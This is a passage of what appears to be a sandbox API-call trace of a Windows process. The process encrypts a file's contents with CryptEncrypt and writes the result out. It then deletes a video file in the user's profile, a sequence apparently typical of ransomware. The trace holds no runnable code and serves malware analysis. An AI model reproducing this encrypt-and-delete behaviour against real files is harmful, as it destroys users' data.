lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0212.336] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0212.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0212.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0212.337] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a92e38 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.339] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0212.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0212.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0212.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.340] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab500, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.340] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4673, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4678) returned 1 [0212.340] CharLowerBuffW (in: lpsz="byte[18040]", cchLength=0xb | out: lpsz="byte[18040]") returned 0xb [0212.341] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.341] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab728, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.341] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a92e38*, pdwDataLen=0x8cef60*=0x4673, dwBufLen=0x4678 | out: pbData=0x2a92e38*, pdwDataLen=0x8cef60*=0x4678) returned 1 [0212.342] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.342] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.342] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.342] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.342] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.342] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.343] WriteFile (in: hFile=0x4f4, lpBuffer=0x2a8a138*, nNumberOfBytesToWrite=0x4678, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a8a138*, lpNumberOfBytesWritten=0x8cf5e4*=0x4678, lpOverlapped=0x0) returned 1 [0212.344] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.344] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.344] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.345] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab5c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.345] CryptDestroyKey (hKey=0x9e2078) returned 1 [0212.345] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.345] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.345] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.345] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.345] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.345] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.346] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.346] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.346] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.346] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.346] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.346] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.346] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.347] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.347] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.347] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.347] CryptReleaseContext (hProv=0xa7c220, dwFlags=0x0) returned 1 [0212.347] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.347] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.347] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.347] CloseHandle (hObject=0x504) returned 1 [0212.348] CloseHandle (hObject=0x4f4) returned 1 [0212.362] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.362] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.362] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/CBK9.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CBK9.flv", lpFilePart=0x8cedf4*="CBK9.flv") returned 0x1f [0212.362] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CBK9.flv" (normalized: "c:\\users\\fd1hvy\\videos\\cbk9.flv")) returned 0x20 [0212.362] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CBK9.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27878a60, ftCreationTime.dwHighDateTime=0x1d5cb64, ftLastAccessTime.dwLowDateTime=0x97abe6e0, ftLastAccessTime.dwHighDateTime=0x1d5d2fa, ftLastWriteTime.dwLowDateTime=0x97abe6e0, ftLastWriteTime.dwHighDateTime=0x1d5d2fa, nFileSizeHigh=0x0, nFileSizeLow=0x4673, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CBK9.flv", cAlternateFileName="")) returned 0x9e2078 [0212.362] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CBK9.flv" (normalized: "c:\\users\\fd1hvy\\videos\\cbk9.flv")) returned 1 [0212.364] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27878a60, ftCreationTime.dwHighDateTime=0x1d5cb64, ftLastAccessTime.dwLowDateTime=0x97abe6e0, ftLastAccessTime.dwHighDateTime=0x1d5d2fa, ftLastWriteTime.dwLowDateTime=0x97abe6e0, ftLastWriteTime.dwHighDateTime=0x1d5d2fa, nFileSizeHigh=0x0, nFileSizeLow=0x4673, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CBK9.flv", cAlternateFileName="")) returned 0 [0212.365] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0212.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0212.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0212.366] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0212.366] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0212.366] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0212.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0212.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0212.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0212.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.367] 